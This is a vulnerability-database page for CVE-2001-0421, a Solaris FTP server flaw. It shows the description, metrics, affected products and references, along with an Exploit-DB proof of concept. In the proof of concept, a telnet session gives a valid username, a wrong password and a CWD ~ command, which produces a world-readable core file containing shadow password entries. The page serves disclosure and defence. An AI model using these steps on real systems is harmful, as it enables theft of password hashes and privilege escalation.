CVE-2001-0421: Details

CVE-2001-0421

2.65%V3
Network
2001-05-24
02h00 +00:00
2002-02-11
09h00 +00:00

CVE Descriptions

FTP server in Solaris 8 and earlier allows local and remote attackers to cause a core dump in the root directory, possibly with world-readable permissions, by providing a valid username with an invalid password followed by a CWD ~ command, which could release sensitive information such as shadowed passwords, or fill the disk partition.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 6.4 | | AV:N/AC:L/Au:N/C:P/I:N/A:P | [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 20764

Publication date: 2001-04-16 22h00 +00:00
Author: warning3
EDB Verified: Yes

source: https://www.securityfocus.com/bid/2601/info

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.

Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.

    [root@ /usr/sbin]> telnet localhost 21
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    220 sun26 FTP server (SunOS 5.6) ready.
    user warning3
    331 Password required for warning3.   <-- a valid username
    pass blahblah   <--- a wrong password
    530 Login incorrect.
    CWD ~
    530 Please login with USER and PASS.
    Connection closed by foreign host.
    [root@ /usr/sbin]> ls -l /core
    -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
    [root@ /usr/sbin]> strings /core|more
    [...snip...]
    lp:NP:6445::::::
    P:64
    eH::::
    uucp:NP:6445:::

Products Mentioned

Configuration 0

Sun >> Solaris >> Version 2.6

Sun >> Sunos >> Versions up to (including) 5.9

References

http://www.securityfocus.com/archive/1/177200
Tags: mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/2601
Tags: vdb-entry, x_refsource_BID